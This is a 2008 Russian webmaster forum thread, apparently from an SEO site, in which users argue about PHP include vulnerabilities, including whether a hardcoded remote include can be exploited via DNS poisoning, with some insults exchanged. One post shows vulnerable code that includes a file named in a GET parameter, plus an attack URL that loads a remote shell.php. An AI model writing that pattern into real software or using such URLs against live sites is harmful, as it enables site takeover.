- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Открывать его можно в том случае, если у программиста прямые руки
Для не ламеров, можно разрешить всё. Но дело в том, что в большинстве клиенты если и не ламеры, то очень мало знающие требования безопасности. А если сервер хостинговый, то рисковать сайтами других клиентов и надеятся на то, что ламеров не будет, как бы не выходит... Слишком часто вижу ситуацию, когда сервер работает не на того кто арендовал, а на того кто ломанул...
Andreyka, Васисуалий
Не те примеры Вы даёте.
Опасность есть в том, что если программист пишет сайт и у него например:
index.php?page=news.php
в коде index.php идёт строка:
$page=$_GET['page'];
include('$page');
то злоумышленник просто может сделать так:
index.php?page=http://site.ru/shell.php
тем самым получит доступ к вашему сайту.
ЭТОТ пример итак понятен, и суть уязвимости ЭТОГО кода тоже.
НО Андрейка утверждает, что уязвимость есть именно в этом коде.
<?php include("http://example.com/includes/example_include.php"); ?>
Дауну Boris A Dolgov, который также считает (отписавшись мне в репу), что в ЭТОЙ строке кода есть уязвимость - срочно лечить голову и покупать учебник по PHP
Васисуалий добавил 21.11.2008 в 20:41
Тем, что example.com можно поменять на нужный ip и сделать включение иного кода, чем ожидалось
Про то, что dns можно отравить и заставить отдать не тот ip, что ожидалось, Васисуалий конечно же незнает
Может ещё напишешь про то, что можно прийти с молотком в серверную и поломать скрипт?
ЭТОТ пример итак понятен, и суть уязвимости ЭТОГО кода тоже.
НО Андрейка утверждает, что уязвимость есть именно в этом коде.
<?php include("http://example.com/includes/example_include.php"); ?>
Дауну Boris A Dolgov, который также считает (отписавшись мне в репу), что в ЭТОЙ строке кода есть уязвимость - срочно лечить голову и покупать учебник по PHP
Васисуалий добавил 21.11.2008 в 20:41
Может ещё напишешь про то, что можно прийти с молотком в серверную и поломать скрипт?
Не надо психовать, все будет хорошо :)
Как уже выше неоднократно отписали
1) основная проблема в строке <?php include($_GET['page']); ?>
2) можно подменить dns у example.com.
3) если Вы не поняли смысла предыдущего пункта, учите не только "php for dummies", а еще "linux for dummies"
4) я на 100% уверен, что у Андрейки намного больше опыта и знаний, нежели чем у Вас. Это видно хотя бы по Вашим постам.
Не надо психовать, все будет хорошо :)
Как уже выше неоднократно отписали
1) основная проблема в строке <?php include($_GET['page']); ?>
2) можно подменить dns у example.com.
3) если Вы не поняли смысла предыдущего пункта, учите не только "php for dummies", а еще "linux for dummies"
4) я на 100% уверен, что у Андрейки намного больше опыта и знаний, нежели чем у Вас. Это видно хотя бы по Вашим постам.
С чего ты, Боря, взял что я не понял смысла пункта 2. Только в серверную тоже можно прийти и скрипт поломать. Вероятность примерно на том же уровне, что и dns poisoning.
Строку <?php include($_GET['page']); ?> в нашем споре никто не разбирал, речь шла только <?php include("http://example.com/includes/example_include.php"); ?>
Это вы уже сейчас на неё слились, когда подумали немного мозгом, а не одним местом.
Ну и блажен кто верует. Вы там не из одной секты случаем?
Господа, прощу прощения - подождите немного, у меня кончился поп-корн.
Инклайд делает не апач а php
Подменить не легко, но реально
Понятно что пхп, а HTTP_HOST где инициируется? тоже в пхп? 😂
Подмена ДНС.. каким образом она вообще влияет на include ? что то тут не договаривается 🙄
PS> тут все расхождения и получаются потому что кто-то силён в программинге, кто-то больше в юниксах и администрировании, кто-то великий знаток пхп, кто-то по секюрити или хостингам, а вот того кто во всём силён похоже тут нету :D
Речь не о подмене _server[http_host], а о подмене айпи для example.com
Всё дело в недопонимании, расхождений здесь нет.
теперь понял, круто, что сказать.. )